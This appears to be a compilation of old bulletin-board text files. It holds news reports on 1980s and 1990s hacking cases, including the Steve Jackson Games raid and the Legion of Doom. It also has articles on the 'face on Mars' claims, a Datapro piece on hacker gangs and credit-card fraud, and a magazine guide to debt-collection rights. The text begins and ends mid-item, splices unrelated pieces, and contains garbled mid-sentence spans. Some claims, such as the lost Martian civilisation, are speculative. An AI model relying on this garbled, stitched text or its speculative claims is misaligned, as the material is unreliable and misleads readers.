last week to two counts of wire fraud involving his illegal possession
of an American Telephone & Telegraph Co. computer program, was not a
member of the "Legion of Doom" computer hacker group, as was reported
Saturday, and did not participate in the group's alleged activities of
breaking into and rummaging through corporate and government computer
systems."

                                                            Hackers in the News
                              HACKERS IN THE NEWS
                                       
                               ORLANDO SENTINEL-
                                       
                    ORIGINATED FROM THE LOS ANGELES TIMES.
  ---------------------------------------------------------------------------
                                       
          HACKERS USED WEAPONS LAB COMPUTER TO DISTRIBUTE PORN -TITLE
                                       
      "-A NEWSPAPER'S PROBE OF IMPROPER INTERNET LED TO THE DISCOVERY OF
                           HARD-CORE GRAPHIC IMAGES.
                                       
   DRAMATICALLY ILLUSTRATING THE SECURITY PROBLEMS POSED BY THE RAPID GROWTH
    OF INTERNET COMPUTER NETWORK, ONE OF THE NATION'S THREE NUCLEAR WEAPONS
    LABS CONFIRMED MONDAY THAT COMPUTER HACKERS WERE USING ITS COMPUTERS TO
                  STORE AND DISTRIBUTE HARD-CORE PORNOGRAPHY.
                                       
        EMABARRASED OFFICIALS AT LAWRENCE LIVERMORE NATIONAL LABORATORY
    IN LIVERMORE, CALIF., WHICH CONDUCT A GREAT DEAL OF CLASSIFIED RESEARCH
   AND HIGHLY SOPHISTICATED SECURITY PROCEDURES, SAID THE INCIDENT WAS AMONG
    THE MOST SERIOUS BREACHES OF COMPUTER SECURITY EVER AT THE LAB EAST OF
                                 SAN FRANCISO.
.
                                                    Hackers in the News (24/25)
        THE OFFENDING COMPUTER, WHICH WAS SHUT DOWN AFTER A LOS ANGELES
     TIMES REPORTER INVESTIGATING INTERNET HACKING ALERTED LAB OFFICIALS,
   CONTAINED MORE THAN 1,000 PORNOGRAPHIC IMAGES.  IT WAS BELIEVED TO BE THE
    LARGEST CACHE OF ILLEGAL HARD-CORE PORNOGRAPHY EVER FOUND ON A COMPUTER
                                   NETWORK.
                                       
        WHILE HACKERS ONCE DEVOTED THEIR EFFORTS TO DISRUPTING COMPUTER
    SYSTEMS AT LARGE ORGANIZATIONS OR STEALING ELECTRONIC INFORMATION, THEY
    HAVE NOW DEVELOPED WAYS OF SEIZING CONTROL OF INTERNET-LINKED COMPUTERS
      AND USING THEM TO STORE AND DISTRIBUTE PORNOGRAPHY, STOLEN COMPUTER
                    SOFTWARE AND OTHER ILLICIT INFORMATION.
                                       
           THE INTERNET, A "NETWORK OF NETWORKS" ORIGINALLY DESIGNED
    TO CONNECT COMPUTERS AT UNIVERSITIES AND GOVERNMENT RESEARCH LABS, HAS
   GROWN DRAMATICALLY IN SIZE AND TECHNICAL SOPHISTICATION IN RECENT YEARS.
    IT IS NOW USED BY MANY BUSINESSES AND INDIVIDUAL COMPUTER USERS, AND IS
    OFTEN VIEWED AS THE PROTOTYPE FOR THE "INFORMATION SUPERHIGHWAY" OF THE
                                    FUTURE.
                                       
       BUT THE INTERNET HAS AN UNDERSIDE, WHERE SO CALLED "PIRATES" WITH
      CODE NAMES LIKE "MR. SMUT," "ACIDFLUX," AND "THE COWBOY" TRAFFIC IN
    ILLEGAL OR ILLEGALLY OBTAINED ELECTRONIC INFORMATION.  THE STRUCTURE OF
.
                                                    Hackers in the News (24/47)
     THE INTERNET MEANS THAT SUCH PIRATES CAN CARRY OUT THEIR CRIMES FROM
     ALMOST ANYWHERE IN THE WORLD, AND TRACING THEM IS NEARLY IMPOSSIBLE.
                                       
          THE FBI LATE LAST WEEK CONFIRMED THAT IT WAS INVESTIGATING
   SOFTWARE PIRACY ON THE INTERNET.  A TIMES REPORTER DISCOVERED A NUMBER OF
     SITES AT PRESTIGIOUS INSTITUTUIONS THAT WERE BEING USED TO DISTRIBUTE
       STOLEN SOFTWARE, INCLUDING ONE IN THE OFFICE OF THE UNIVERSITY OF
                             CALIFORNIA, BERKELY.
                                       
        PIRATES ALSO HAVE THEIR OWN "CHAT" LINES, A SERIES OF CHANNELS
    WITHIN A SERVICE CALLED THE INTERNET RELAY CHAT.  AN ELABORATE PECKING
   ORDER DETERMINES WHO WILL BE ALLOWED TO TAKE PART IN THESE CONVERSATIONS
   - NEWCOMERS CAN OFTEN WANGLE THEIR WAY IN IF THEY HAVE A PARTICULARLY HOT
                          PIECE OF SOFTWARE TO OFFER.
                                       
       SANDY MEROLA, DEPUTY DIRECTOR OF INFORMATION AND COMPUTING AT THE
   BERKELY LAB, SIAD THAT THE PIRATE SITE WAS SHUT DOWN LAST WEEK AFTER THE
    TIMES INVESTIGATION REVEALED ITS EXISTENCE.  MEROLA SAID THE DEPARTMENT
    OF ENERGY, WHICH OVERSEES LAB OPERATIONS, AS WELL AS THE FBI, HAD BEEN
                           NOTIFIED OF THE INCIDENT.
                                       
        AT LAWRENCE LIVERMORE, OFFICIALS SAID MONDAY THAT THEY BELIEVED
.
                                                    Hackers in the News (24/69)
     AT LEAST ONE MORE LAB EMPLOYEE WAS INVOLVED IN THE PORNOGRAPHY RING,
   ALONG WITH AN UNDETERMINED NUMBER OF OUTSIDE COLLABORATORS.  CHUCK COLE,
   DEPUTY ASSOCIATE DIRECTOR OF COMPUTING AT THE LAB, SAID THAT NEARLY 2,000
   MEGABYTES OF UNAUTHORIZED GRAPHICAL IMAGES HAVE BEEN FOUND IN A LIVERMORE
            COMPUTER, AND HE CONFIRMED THAT THEY WERE PORNOGRAPHIC.
                                       
       THE EMPLOYEE HAS BEEN PLACED ON "INVESTIGATORY LEAVE" AND HIS OR
   HER SECURITY BADGE CONFISCATED WHILE AN INVESTIGATION IS UNDERTAKEN, THE
   LAB SAID.  IT IS UNCLEAR WHETHER THE PORNOGRAPHIC IMAGES WERE BEING SOLD
       OR HOW MANY PEOPLE HAD GAINED ACCESS TO THEM.  THE PICTURES WERE
   SUFFICIENTLY GRAPHIC THAT THEY WOULD LIKELY BE CONSIDERED OBSCENE BY THE
  COURTS, AND THEREFORE TRANSMITTING THEM OVER THE INTERNET WOULD BE ILLEGAL.
                                       
         THE MASSIVE AMOUNT OF STORAGE CAPACITY USED IN THE LIVERMORE
         SCHEME SHOWS HOW INTERNET HACKING COULD BE QUITE PROFITABLE.
                                       
       THERE WERE INDICATIONS THAT THE PERSON OPERATING THE PORNOGRAPHY
    DATABASE HAD BECOME AWARE OF POSSIBLE SCRUTINY.  ON JUNE 27, A MESSAGE
   LEFT IN A FILE LABELED READ ME!!! SAID, "IT APPEARS THAT NEWS ABOUT THIS
     SITE HAS ESCAPED, IN THE PAST TWO WEEKS, I HAVE HAD 27 UN-AUTHORIZED
    HOSTS ATTEMPT TO ACCESS MY SERVER.  THIS DOES NOT GIVE ME A WARM-FUZZY
 FEELING.  I WOULD HATE TO HAVE TO SHUT THIS DOWN, BUT I MAY HAVE NO CHOICE."
.
                                                    Hackers in the News (25/92)
         ONE COMPUTER EXPERT, WHO REQUESTED ANONYMITY, SIAD THAT THERE
    MIGHT BE MORE TO THE INCIDENT THAN MEETS THE EYE.  THE EXPERT SUGGESTED
   THAT THE HARD-CORE PORNOGRAPHY MAY BE A COVER FOR AN ULTRA-SOPHISTICATED
      ESPIONAGE PROGRAM, IN WHICH A "SNIFFER" PROGRAM COMBS THROUGH OTHER
     LIVERMORE COMPUTERS, ENCODES THE PASSWORDS AND ACCOUNTS IT FINDS, AND
      THEN HIDES THEM WITHIN THE PORNOGRAPHIC IMAGES, PERHAPS LATER TO BE
                      DOWNLOADED LATER BY FOREIGN AGENTS.
                                       
         BUT COLE SAID THERE WAS NO POSSIBILITY OF A COMPUTER INTRUDER
             GAINING ACCESS TO CLASSIFIED DATA AT LIVERMORE LABS."
                                       
   
   ___________________________________
   [Home[1]] [Main[2]] [Prev[3]] [Next[4]]

             " U.S. computer investigation targets Austinites "
           ------------------------------------------------------



  [ The above caption high-lighted the Saturday March 17, 1990 edition
  of the Austin American-Statesman [ Austin, Texas ].  The article has
  been copied in its entirety, and the main point for typing this up
  was because of the involvement of the LOD/H throughout the article. ]





      The U.S. Secret Service has seized computer equipment from two
 Austin homes and a local business in the past month as part of a federal
 investigation into electronic tampering with the nation's 911 emergency
 network.
      Armed Secret Service agents, accompanied by officers from the Austin
 Police Department, took the equipment in three March 1 raids that sources
 say are linked to a nationwide federal inquiry coordinated by the Secret
 Service and the U.S. attorney's office in Chicago.
      While federal officials have declined to comment on the investigation
  - which focuses on a bizarre mix of science fiction and allegations of
 high-tech thievery - the Austin American-Statesman has learned that the
 raids targeted Steve Jackson Games, a South Austin publisher of role-
 playing games, and the home of Loyd Blankenship, managing editor at the
 company.
      A second Austin home, whose resident was acquainted with Jackson
 officials, also was raided.
      Jackson said there is no reason for the company to be investigated
 .  Steve Jackson Games is a book and game publisher of fiction, he said,
 and it is not involved in any computer-related thefts.
      The agents, executing search warrants now sealed by a judge from
 public view, took computer equipment, including modems, printers, and
 monitors, as well as manuals, instruction books and other documents.  The
 equipment has been forwarded to federal officials in Chicago.
      The Secret Service, best-known for protecting the president, has
 jurisdiction in the case, government officials say, because damage to
 the nation's telephone system could harm the public's welfare.  In
 addition, the system is run by American Telephone & Telegraph Co., a
 company involved in the nation's defense.
      The 911 investigation already has resulted in the indictment of
 two computer "hackers" in Illinois and sources say federal authorities
 now are focusing on Austin's ties to a shadowy underground computer
 user's group known as the Legion of Doom.
      The hackers, who live in Georgia and Missouri, where indicted in
 Chicago.  they are believed to be members of the Legion of Doom and
 are charged with seven counts, including interstate transportation of
 stolen property, wire fraud, and violations of the Computer Fraud and
 Abuse Act of 1986.
      The government alleges that the defendants stole a computerized
 copy of Bell South's system that controls 911 emergency calls in nine
 states.  The information was then transferred to a computer bulletin
 board and published in a hacker publication known as Phrack!
      A trial in the case is scheduled to begin in June.
      U.S. agents also have seized the final drafts of a science
 fiction game written by the Austin-based game company.  Sources say
 the agents are trying to determine whether the game - a dark, futur-
 istic account of a world where technology has gone awry - is being
 used as a handbook for computer crime.  Steve Jackson, the owner of
 the local company and a well-known figure in the role-playing game
 industry, said neither he nor his company has been involved in
 tampering with the 911 system.
      No one in Austin has been indicted or arrested as a result of
 the investigation.  "It is an on-going investigation.  That is all
 I can say," said Steve Beauchamp, special agent-in-charge of the
 Secret Service Austin field office.  "Until we can put it all
 together, we just do not comment," he said.
      Bob Rogers, Jackson's Dallas attorney, said federal officials
 have assured him that neither Jackson nor Jackson Games is the tar-
 get of the probe.  The authorities would not tell Rogers whether the
 inquiry focused on other company employees.  As for the science fiction
 game, called Cyberpunk, Jackson said federal authorities have mistaken
 a fictional work for a technical manual [E.N. Why does this sound all
 too familiar?] .
      "It's not a manual for computer crime any more than a Reader's
 Digest story on how to burglar-proof your house is a manual for
 burglars," said Jackson, 36.  "It's kind of like the hints you get
 on safe-cracking from a James Bond movie."
      Blankenship, the author of the book, said his attorney has advised
 him not to comment on the book or the Secret Service investigation.
      Jackson said he guesses his company was linked to the 911 probe
 by its use of a computer bulletin board system, called Usenet.  The
 board, one of hundreds throughout the country, is a sort of electronic
 Town Square, where personal computer users from throughout the world
 can tap into the system via phone lines and a modem.
      The network, free and relatively unregulated, is an information
 exchange where users can post information, exchange electronic messages
 and debate with keyboards everything from poetry and politics to nuclear
 war.
      One of the world's largest networks - boasting more than 600,000
 users - Usenet was tapped by Chinese students in North America to
 organize support for students during the pro-democracy demonstrations
 last year.  The network also was infected in 1988 by a now-famous
 computer "virus" unleashed by college student Robert Morris.
      Jackson said his company has maintained a bulletin board on
 the Usenet network on which it posts advanced copies of its role-
 playing games.  The firm posts the games and requests that the users
 of the network comment on the text and propose improvements.
      The Jackson bulletin board, called Illuminati, greets users with
 the company's logo and a message that states: "Welcome to the World's
 Oldest and Largest Secret Conspiracy."
      Over the past several months, the company has been posting drafts
 of Cyberpunk for review.
      The resident of the second Austin home raided by the Secret Service
 was acquainted with Jackson and had made comments about the game on
 Usenet.  He asked to remain anonymous.
      Typical of Cyberpunk literature, the game is set in a bleak future,
 much like the world portrayed in Max Headroom, formerly a network
 television program.  Computers and technology control people's thoughts
 and actions and are viewed both as a means of oppression and as a method
 of escape.  Portions of Jackson's Cyberpunk viewed by the Austin American
 Statesman include a detailed discussion on penetrating government computer
 networks and a list of fictitious programs used to break into closed
 networks.  Bruce Sterling, an Austin science fiction writer and one of
 the world's best-known Cyberpunk writers, said Jackson's game and its
 computer-related discussions are hardly unusual for the genre.
      "Cyberpunk is thriller fiction."  Sterling said.  "It deals to a
 great extent with the romance of crime in the same way that mysteries
 or techno-thrillers do."  He said the detailed technical discussions
 in the Jackson games are what draws people to them.  "That's the
 charm of simulating something that's supposed to be accurate.  If
 it's cooked up out of thin air, the people who play these games are
 going to lose interest."
       Jackson, though, said he has been told by Secret Service agents
 that they view the game as a user's guide to computer mischief.  He
 said they made the comments where he went to the agency's Austin
 office in an unsuccessful attempt to reclaim some of his seized
 equipment.  "As they were reading over it, they kept making outraged
 comments," Jackson said. "When they read it, they became very, very
 upset.  "I said, 'This is science fiction.'  They said, 'No.  This
 is real.'"
       The text of the Cyberpunk games, as well as other computer
 equipment taken from Jackson's office, still has not been returned.
 The company now is working to rewrite portions of the book and is
 hoping to have it printed next month.  In addition to reviewing
 Cyberpunk, sources say federal authorities currently are investigating
 any links between local computer hackers and the Legion of Doom.  The
 sources say some of the 911 information that is the subject of Chicago
 indictments has been traced to Austin computers.
       Jackson's attorney said federal officials have told him that
 the 911 information pilfered from Bell South has surfaced on a computer
 bulletin board used at Steve Jackson games.  But the information
 apparently has not been traced to a user.  Jackson said that neither
 he nor any of his employees is a member of the Legion of Doom.
        Blankenship, however, did consult with the group in the
 course of researching the writing the Cyberpunk game, Jackson said.
 Further, the group is listed in the game's acknowledgments for its
 aid in providing technical information used in Cyberpunk.  For these
 reasons he believes Blankenship is a local target of the federal probe,
 though none of the investigators has yet confirmed his suspicion.
       "My opinion is that he is (being investigated)," Jackson said,
 "If that's the case, that's gross.
       "he had been doing research for what he hoped would be a mass-
 market book on the computer underground," Jackson said.
       The other Austin resident raided by the authorities, who asked
 to remain anonymous, acknowledged that he is the founding member of
 the Legion of Doom and that copies of the 911 system had surfaced on
 the group's local bulletin board.  The 20-year-old college student
 said the information hardly posed any threat to the 911 system.
 "It was nothing," he said.  "It was garbage, and it was boring."
       In the Chicago indictment accuses the group of a litany of
 electronic abuses, including: disrupting telephone service by
 changing the routing of telephone calls; stealing and modifying
 individual credit histories; stealing money and property from
 companies by altering computer information; and disseminating
 information about attacking computers to other computer hackers.
       The Austin Legion of Doom member said his group's worst
 crime is snooping through other people's computers.  "For the
 most part, that's all we do," he said.  "No one's out ripping
 off people's credit cards.  No one's out to make any money.
       "We're just out to have fun."
       The group member said the fact that the legion is shrouded
 in mystery adds to its mystique - and to the interest law
 enforcement agents have in cracking the ring.  "It's an entirely
 different world," the student said.  "It's a very strange little
 counter-culture.  "Everybody who exists in that world is familiar
 with the Legion of Doom," he said.  "Most people are in awe or are
 intimidated by it."



                                  (C)opied by Pizzia Man
                                   03/18/9


July 8, 1988
               SOME SEE GLIMPSE OF LIFE IN 'FACE' OF MARS
               AP and UPI

    WASHINGTON - Unusual formations on the surface of Mars - including a
mile-long rock shaped like a human face - may have been carved by a lost
civilization, four scientists said yesterday.
    The scientists, including a former astronaut, said at a news conference
that the chances are better than 50-50 that the structures were made by
intelligent beings.
    The scientists said that a photograph taken of the Martian surface in
1976 by NASA's Viking spacecraft clearly shows a face that could have been
carved out of a Martian mountain a half-million years ago.
    The sphinx-like image that stares outward from the planet may be part of
a complex of buildings, as evidenced by other unusual formations nearby, the
scientists said.

    Brian T. O'Leary, a former astronaut and an expert on Mars, said there
is sufficient uncertainty about the origin of the rock face that it should
be a major target for future spacecraft sent to Mars.
    O'Leary said last January he asked Soviet space scientists who were
preparing to send probes to Mars to examine the area where the face appears.
He said the Soviets were interested, but replied that their spacecraft was
not technically designed to study the Cydonia region of Mars, where the
sight is located.
    The Soviets launched a probe toward Mars yesterday and plan to launch a
second one later this month.
    The news conference yesterday was prompted by a recent study of the
Viking photographs conducted by Mark Carlotto, an optical engineering
expert.

    In an article published in Applied Optics, Carlotto said that a computer
enhancement of the Viking photographs shows that the face and various other
nearby features appear to have been carved by "intelligent design."
Yesterday, Carlotto told reporters that a sophisticated statistical study of
the shapes clearly shows that "the face is not natural."
    Richard Hoagland, founder of a private organization of scientists called
"The Mars Project," said that in addition to the face there is "a complex of
unusual objects" at the Cydonia site.  The complex includes a five-sided
mountain that resembles a pyramid and a massif he believes could have been
part of an astronomical marker.

    Hoagland said that a line drawn from the center of the city, across the
face to the massif, or cliff, would line up exactly with the Sun at the
moment of Mars' summer solstice, as it would have occured 500,000 years ago
- an alignment it is extremely unlikely could occur naturally.


(Source: The San Diego Union - July 8, 1988)

    13-Feb-88 01:53 MST
Sb: APn  02/03 1227  Mars Mania
 Copyright, 1988. The Associated Press. All rights reserved. 

By RICHARD COLE Associated Press Writer 
   MIAMI (AP) -- This year, Mars makes its closest approach to Earth in a
generation, and astronomers say the red planet's appearance in the night sky
may be the astronomical event of 1988. 
   As if to demonstrate the heavens have a sense of humor, the height of the
show comes in September, just shy of the 50th anniversary of Orson Welles' 1938
"War of the Worlds" broadcast that panicked the nation with fictional reports
of invaders from Mars. 
   "I see 1988 as a great Martian adventure," said Jack Horkheimer, the aptly
named "Star Hustler" of the Public Broadcasting System and executive director
of Miami's Space Transit Planetarium. "I'm like a kid in a candy store." 
   When Mars is at its closest on Sept. 21 -- just over 36 million miles away
-- it will rival Jupiter as the brightest object in the sky after the Moon and
Venus. 
   "It won't be this close again until 2003," says Horkheimer. "And there are a
lot of kids out there who have never seen it this bright." 
   Unlike the comets Halley and Kohoutek, Mars will not disappoint viewers,
because its brightness is more predictable and the planet will be easily
visible from almost everywhere. 
   He expects a spate of UFO sightings to accompany Mars' visit as people
unaccustomed to the unblinking reddish-orange light in the night sky mistake it
for more exotic extraterrestrial visitors. 
   Like planetarium directors around the nation, Horkheimer is preparing a
series of Mars shows he promises will "knock your socks off." 
   One involves a snazzy computerized simulation of a flight through the
planet's gigantic 2,500-mile-long version of the Grand Canyon. Another centers
around an 18-mile-high mountain -- three times higher than Mount Everest --
capped by a crater the size of Georgia. 
   He also is bringing to the planetarium a new telescope nicknamed "Awesome
Orson" in honor of the late Welles' broadcast and girth. 
   Although Earth passes Mars every two years, it is only every 15 to 17 years
that the orbits of the third and fourth planets bring them as close together as
in 1988. The year began with Earth and Mars separated by 200 million miles. 
   The close encounter comes four years before a scheduled Mars probe by the
Soviet Union. 
   The Soviet plan to have the probes bring back Martian soil, and perhaps,
Horkheimer said, settle the most intriguing question about Earth's neighbor --
whether life once existed on the now cold and arid desert planet. 
   U.S. Mars landers in the 1970s tried to answer that question, but the
chemical soil test results beamed back to Earth were inconclusive. 
   "I really hope that they find fossilized signs of life," he said. "We know
that there was water on Mars." 
   Horkheimer said he also hopes the Soviet probes will spur the United States
to revive its own space program, with a manned landing on Mars. 
   "We could be on Mars easily within a decade or so," he said. "The technology
already exisits. What is missing is the money." And the funds will be available
only when the public once again supports spending the billions of dollars in
funding a Martian landing would require. 
   If the political situation allows it, a joint U.S.-Soviet mission to Mars
could ease the financial burden on both countries, he said. 
   It also could promote peace between the two rivals -- an ironic benefit from
a planet named after the Roman god of war. 


 
                             Phile 1.6 of 1.14

               THE HACKER MENACE AND ELECTRONIC BULLETIN BOARDS
               ------------------------------------------------
                         Typed by: {ode {racker
 
This was taken out of the Network Security Magazine published by Datapro
Research.  I found this article to be quite funny along with antinque
news.  So I thought I share it with you for a laugh or whatever.
 
Also this article was written by a EX-HACKER! How does one become a 
EX-HACKER, please tell me!!!!
 
 
 
HACKER GANGS
------------>
 
Early computer hackers tended to be college students.  With the advent
of home computers, and the teaching of computer basics at the grade
school level, the average age of the begininning (youth) hacker has
dropped to only 14!!  The overwhelming majority of BBS owners and users
are teenagers.  Teens tend to form cliques and peer groups, so the 
formation of phone phreak and hacker gangs was inevitable.  The parents
of these bright teens usually do not, themselves, understand the power
of the computer.  This means that the teens are not subject to the same
parental restrictions that would govern their using the family car.
 
Many parents veiw the home computer as an excellent baby-sitting device.
If their child spends an evening quietly in his/her room with the computer
the parents feel that thier offspring is not getting into any trouble.
In reality, these teens may be engaging in electronic gang activites
that have very serious implications.  Losses to the software industry
alone are staggering!!!
 
Unfortunately, many of the gang leaders are older, more experienced
teens, perhaps college students.  These people are interested in hacking 
not for its intellectual challenge, for for its financial rewards.  A
few gang leaders are adults who are politically or firal adults who are major figures behind the cracking and
distribution of pirated software for resale to the public.  One
adult gang leader openly solicited credit card numbers from the 
juvenile members in exchange for fraudulently obtained hard disk drives
and other equipment.  Some of the teenage leaders seek notoriety and
acclaim from their peers.  They strive to be the biggest phreaker or 
to have broken into the greatest number of computer systems.
 
The gangs may be local in nature such as the infamous "Milwaukee 414
gang"; they may be national in nature, like the "Inner Circle"; or
even international.  One such international group is "NYSHII" or 
"CHAOS" both cracking and pirating clubs with headquaters in both 
West Germany and the United States.  All of these groups had a BBS
that was their main base of operations and served supposedly as a
sercure communications center.  The 414s had a private BBS that was 
so sercet it didn't even have a namme.  The Inner Circle had a 
Securityland BBS and Illegitimate accounts on GTE'S Telemail network.
Chaos operates on a variety of BBS's in both the U.S. and West Germany.
NYSHII (New York Safehouse II) to this date has baffled local and
international law enforcement agencys as to it's true whereabouts.  
The Sysop "The Line Breaker" has found a way of changing the BBS's
location on a weekly basis without moving the master computer.
 
ORGANIZED CRIME AND THE BBS
--------------------------->
 
Naturally, an underground BBS could be used by organized crime in
much the same manner as the teen hacker gangs use them.  The author
has good reason to believe thgat organized crime is controlling a
number of BBS systems in the Midwest, the New York City area, and
in Florida.  One informant claims there is a bbs that is located
in an off-track betting parlor.  Teenagers are easily recruited to 
act as information gathers for organized crime.  The young people
work for little or nothing and, in most cases, do not even know
that they are being used.  The author and other adult hackers have
been approached and offered large sums of money tamper with
banking and credit data computer systems.  Organized crime is 
moving into this new area of crime.  There is a real and present
danger if BBSs continue to be alloowed to operate unchecked.
 
Underground BBSs may be creating a whole new generation of 
criminals.  As the youthful hackers mature, their interest in hacking
as an intellectual challenge and rebellion against authority
may be replaced by profit motive.  College students always seem
to need money and the teens who do not go to college may find it 
difficult to obtain a job.  It is only natural that these individuals
would graviate into hacking for personal gain.  For example, many
bulletin boards cater to those who are involved in credit card fraud.
There is also evidence that drug dealers use BBSs to arrange swaps
of stolen property for drugs.  Hackers who have learned how to access
credit bureau systems, such as TRWs, have discovered that making 
unauthorized credit checks foe
business.  
 
Credit bureau computer penetrations are routine in the hacker under-
ground.  The typical hacker gang obtains credit card numbers from
discarded charge slip carbons.  As an alternative, one or more
hackers who work in retail establishments may supply card numbers.
Other gang members can then check the cards for credit limits and
expiuration dates by using the telephone or illegally accessing 
credit bureau computers.  Others in the gang set up mail drops 
and safe houses for the deliverly of the merchandise ordered by mail
and charged to the credit card numbers.  Since the gangs know no
geographic boundaries, it is difficult to investigate these frauds.
 
Some commerical time-sharing services, such as Comp-u-serve, allow
merchandise to be ordered via computer and shipped to the user's
address.  ime-sharing accounts are easily obtained with a stolen 
credit card.  This allows the thief to order merchandise with little
fear of being traced.  These new high tech thieves are replacing
more traditional criminals.
 
The hackers and phone phreaks have knowledge and skill to completly
disrupt major communication and computer networks.  All that is lacking 
is organization, planning and financing.  If enemy power should
infiltrate and organize this underground, the consequences could
be disastrous.
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                What You Should Know About Collection Agencies

                 "Cosmopolitan" (November 1984) pp 136-143



     Karen Hartney laughed when she pulled the lavishly  illustrated  book on
Galapagos Islands wildflowers out of her  mailbox.   She  hadn't ordered  the
book, wasn't about to pay for it, and  felt   no  obligation  to  go  to  the
trouble and expense of returning it.
     Two weeks later, she was billed $29.95,  plus mailing and handling.  She
threw the statement in  the  trash.     In  time,  the  letters  grew  nasty,
demanding payment and warning that her  credit rating  would  suffer  if  she
didn't respond promptly.  When a collection agent began  calling her at work,
she snapped.
     "Leave me  alone,"  Karen  hissed.   "I  never  wanted  that  dumb  book
anyway!"
     "You might  have thought of that before you decided to keep it," the man
responded.  "I think  the  word  for  taking  things  that  aren't  yours  is
'stealing.'"
     Karen  (whose name has been changed)  was furious--  but  also  worried.
Could the collection agency harm her credit  rating,  contact  her  employer,
neighbors, landlord?  Most of all, she just wanted the  harassing  calls  and
letters to stop.   Though  resentful,  she  mailed the  payment--  now a full
$37.50, including interest and collection charges.
     Karen's case is not an isolated one.   Despite the strong  new  consumer
protection laws passed in recent years,  abuses still exist,  and  a sizeable
minority  of  retailers  and  collection  agencies  engage  in  such  illegal
collection practices.   Charging for unordered goods is only one of the  many
activities that are prohibited by federal law.  (If, by the way,  you receive
unrequested merchandise as Karen did, you are under  no  obligation  to  pay.
You may treat it as a free gift,   but  you  should  notify  the  sender,  in
writing, of your intention as soon as you receive a "bill".)
     The thorniest problems occur when a debt is truly owed and  a  consumer,
through overextension or inadvertence, falls behind in paying it.    In  this
case,  the account is often  turned over to a collection  agency,  which  may
behave unethically in its effort to recoup the money.
     "Some of the most  extreme  cases  we  see  involve  actual  threats  of
violence," reports Diane Conner,  staff attorney  for  the  Credit  Practices
Division of the Federal Trade Commission (FTC).   "Children  have  been  told
over the phone,  'Tell your parents they're  going  to  jail  tomorrow  if we
don't get the money.'    We've also heard about collection agencies trying to
add on illegal fees of up to 100 percent of the original debt."
     Federal law protects you against such abusive  practices.    By  knowing
which tactics are illegal and how  to  stop  them,  you  can  avoid  being  a
victum.

BEYOND THE LEGAL LIMIT______________________________________________________

     The following are violations of consumer protection laws:

     REPETITIVE CALLING OR CALLS AT UNUSUAL TIMES OR PLACES.  Some collection
agents will call a consumer repeatedly during  a  single  day,  or  telephone
late at night without permission--  both of which are clearly  illegal  under
the Fair Debt Collection Practices Act (FDCPA).
     Calls at work are not considered "harassing" if an office  is  the  most
convenient place for you to receive the call-- but, says  Diane  Conner,  "If
the agent knows that your employer does not allow  you  to  receive  personal
calls at work, or if you've asked not to be contacted there,  then  it  would
be a violation."

     CALLS TO PERSONS OTHER THAN THE CONSUMER.    If a collection  agent  has
business with you, you are the only person with  whom  he  may  discuss  that
business.    "We frequently hear  that  a  collection  agent  has  called  an
employer,  or perhaps a neighbor,  and  left  an  "urgent message'  that  the
consumer should call XYZ Collection  Agency  regarding  payment  of  a debt,"
reports Bill McDonough, an FTC staff attorney.   "The only motive would be to
embarass the consumer, and it's against the law."

     ABUSIVE, OBSCENE, OR THREATENING LANGUAGE.   Late bill payers have  been
called deadbeats and bums, subjected to rude and  obscene language, and given
veiled as well as direct threats of  violence  and  imprisonment.    If  this
happens,  end the conversation immediately,  requesting  that  you  never  be
contacted again.    Follow up with a brief letter barring future contact with
the collection agency.    You may then wish to file a complaint with the  FTC
or state consumer protection agency, or pursue private legal action.

     MISLEADING THREATS OF LEGAL ACTION.  No one has the right to make  false
threats or to claim that legal action has been or is about to  be  instituted
if that's not the case.  Also prohibited are papers that look  like  official
notices from a state agency  or  court  of  law--  including  documents  with
headings that mimic a common legal  form  (such as  "Ace Collection Agency v.
Jane Consumer") or ones that use an agency name similar to that of a state or
federal agency.

     OTHER ABUSIVE BEHAVIOR.    Because  debt   collectors   show   infinite
ingenuity, the Fair Debt Collection Practices Act  covers  scores  of  other
forbidden tricks,  from tacking on  collection  charges  not  authorized  by
contract or law,  to using false names and  publishing lists of consumers in
debt.   Realizing that it could not forsee every  possible  abuse,  Congress
even added a prohibition against any  "harassing,  oppressive,  and  abusive
conduct"--  a general phrase that increases the power of the courts and  the
Federal  Trade  Commission  to  protect  you  against  improper   collection
practices.

STEPS TOWARD SELF-DEFENSE____________________________________________________

     What can you do if you're the victum of an overeager collection  agency?
Your first and simplest option under the FDCPA is to request in writing  that
all collection contacts stop.   Once you do that,  the collection  agency  is
not allowed to call or write to demand payment;  it can only  advise  you  of
new action, such as the referring of your account back  to  the  creditor  or
the filing of legal action.
     if the harassment  continues,   you  may  wish  to  contact  your  state
consumer agency.    According  to  Cyra  Narva  of  the  Consumer  Assistance
Division of the Massachusetts State Banking Department,  these agencies  will
often intervene  to  solve  the  problem.    "Usually,"  Narva reports,  "the
consumer is content  just to know that the rug has been pulled out from under
the collection agency and that the abusive practices will stop."
     The agencies won't compensate you for their past  harassment;  however a
successful lawsuit might.    You could bring suit under  the  FDCPA  and,  if
successful,  recover a cash judgement of actual damages suffered,  attorney's
fees, sourt costs,  and a special statutory  award  of  up  to  one  thousand
dollars.
     "If a consumer has been truly  injured,"  says  Willard  Ogburn,  deputy
director of the National Consumer  Law  Center,  "he or she is entitled to be
compensated.   The fact that attorney's fees may be recovered in a successful
case encourages  some attorneys to pursue strong cases on a commission basis,
while the possibility of an  extra  statutory  award  of  up  to  a  thousand
dollars acts as an extra incentive to the consumer.   Meanwhile,  the  public
interest is served as  collection  agencies  learn  that  violating  consumer
protection laws can be very expensive."
     Whatever decision you make,  you're sure to reap some gratification from
simply standing up for your  rights  and  the  rights  of  others  like  you.
Rudeness and abuse need never be tolerated,  and  you  can  see  to  it  that
they're not.

+----------------------------------+    +-----------------------------------+
|        STOPPING TROUBLE          |    |    CONSUMER AGENCIES  THAT CAN    |
|        BEFORE IT STARTS          |    |     HELP YOU PROTECT YOURSELF     |
|                                  |    |                                   |
|     Healthy credit use  is  not  |    |  THE  FEDERAL  TRADE  COMMISSION  |
|  inconsistent    with     sound  |    |  (FTC).   Your  regional  office  |
|  personal  finance  management,  |    |  can advise you of  your  rights  |
|  but if you  overextend,  these  |    |  and may even make  an  investi-  |
|  measures should enable you  to  |    |  gation if a collection agency's  |
|  resolve the  problem   without  |    |  abuse has  been  severe  or  if  |
|  becoming vulnerable to further  |    |  yours is one  of  several  com-  |
|  embarassment or harassment:     |    |  plaints   against   the    same  |
